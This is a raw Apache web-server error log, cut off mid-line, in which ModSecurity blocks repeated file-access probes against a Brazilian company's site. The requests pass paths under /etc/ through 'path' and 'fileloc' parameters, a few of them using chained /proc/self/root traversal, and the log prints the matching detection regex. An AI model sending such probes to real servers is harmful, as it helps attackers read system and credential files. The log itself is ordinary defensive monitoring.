[Fri Mar 20 05:31:25.571488 2026] [:error] [pid 31215:tid 140411624429312] [client 57.141.18.39:56818] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F3QF0L0L-SsrnPo5KbwAAAs4"]
[Fri Mar 20 05:31:25.829787 2026] [:error] [pid 15826:tid 140411725141760] [client 57.141.18.12:56838] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F3eoXxyEfFpUF8f9kPgAAAUI"]
[Fri Mar 20 05:31:27.657614 2026] [:error] [pid 11642:tid 140411599251200] [client 57.141.18.68:56876] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F37ninkcc-iUj5ApBHwAAA5E"]
[Fri Mar 20 05:31:27.683012 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.107:56864] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F3vXLqtnMIWvjpaJ8pgAAApI"]
[Fri Mar 20 05:31:29.290117 2026] [:error] [pid 26799:tid 140411599251200] [client 57.141.18.101:57010] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F4da6ubjKNq_cu4az8AAAA1E"]
[Fri Mar 20 05:31:29.699093 2026] [:error] [pid 7893:tid 140411616036608] [client 57.141.18.112:57040] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F4RCii7xarUs8iHZJiQAAAg8"]
[Fri Mar 20 05:31:29.847086 2026] [:error] [pid 11642:tid 140411716749056] [client 57.141.18.66:57048] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F4bninkcc-iUj5ApBIQAAA4M"]
[Fri Mar 20 05:31:30.217382 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.108:57074] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F4uoXxyEfFpUF8f9kRQAAAUQ"]
[Fri Mar 20 05:31:30.244399 2026] [mime_magic:error] [pid 26799:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:57076] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:31:30.619455 2026] [:error] [pid 11642:tid 140411574073088] [client 57.141.18.87:57104] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F4rninkcc-iUj5ApBJQAAA5Q"]
[Fri Mar 20 05:31:30.751957 2026] [:error] [pid 7893:tid 140411641214720] [client 57.141.18.21:57116] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F4hCii7xarUs8iHZJjQAAAgw"]
[Fri Mar 20 05:31:31.240455 2026] [:error] [pid 9818:tid 140411607643904] [client 57.141.18.3:57158] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F411pVZ5mVmJwsFMSNQAAAFA"]
[Fri Mar 20 05:31:31.329454 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:35158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0F49a6ubjKNq_cu4az8wAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:31:31.546375 2026] [:error] [pid 11167:tid 140411658000128] [client 57.141.18.96:57178] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F4_HIg5MgXLBnicPcFQAAAco"]
[Fri Mar 20 05:31:33.783140 2026] [:error] [pid 21219:tid 140411649607424] [client 57.141.18.26:57290] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F5fXLqtnMIWvjpaJ8qwAAAos"]
[Fri Mar 20 05:31:33.783748 2026] [:error] [pid 9818:tid 140411574073088] [client 57.141.18.68:57274] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F5F1pVZ5mVmJwsFMSNwAAAFQ"]
[Fri Mar 20 05:31:33.792637 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.75:57258] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F5PqxLDW4GITHUkTFTgAAAQo"]
[Fri Mar 20 05:31:33.803811 2026] [:error] [pid 10189:tid 140411540502272] [client 57.141.18.40:57302] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F5TJ3M9BSuKP7CAb1lAAAAJg"]
[Fri Mar 20 05:31:33.959750 2026] [:error] [pid 10189:tid 140411582465792] [client 57.141.18.68:57328] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F5TJ3M9BSuKP7CAb1lQAAAJM"]
[Fri Mar 20 05:31:33.991874 2026] [:error] [pid 11167:tid 140411582465792] [client 57.141.18.51:57330] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F5fHIg5MgXLBnicPcHgAAAdM"]
[Fri Mar 20 05:31:35.994018 2026] [:error] [pid 9818:tid 140411699963648] [client 57.141.18.40:57358] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F5l1pVZ5mVmJwsFMSOgAAAEU"]
[Fri Mar 20 05:31:35.999144 2026] [:error] [pid 21219:tid 140411733534464] [client 57.141.18.103:57366] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F5_XLqtnMIWvjpaJ8rgAAAoE"]
[Fri Mar 20 05:31:36.001543 2026] [:error] [pid 21219:tid 140411540502272] [client 57.141.18.112:57376] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F5_XLqtnMIWvjpaJ8sgAAApg"]
[Fri Mar 20 05:31:36.687155 2026] [:error] [pid 10189:tid 140411616036608] [client 57.141.18.83:57460] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F6DJ3M9BSuKP7CAb1mgAAAI8"]
[Fri Mar 20 05:31:36.987126 2026] [:error] [pid 10189:tid 140411624429312] [client 57.141.18.99:57466] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F6DJ3M9BSuKP7CAb1mwAAAI4"]
[Fri Mar 20 05:31:37.416197 2026] [:error] [pid 10189:tid 140411632822016] [client 57.141.18.107:57482] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F6TJ3M9BSuKP7CAb1ngAAAI0"]
[Fri Mar 20 05:31:38.204639 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.29:57542] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F6vqxLDW4GITHUkTFVgAAARg"]
[Fri Mar 20 05:31:38.475041 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.241.31:51676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0F6vqxLDW4GITHUkTFVwAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:31:39.231117 2026] [:error] [pid 31215:tid 140411674785536] [client 57.141.18.121:57624] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri 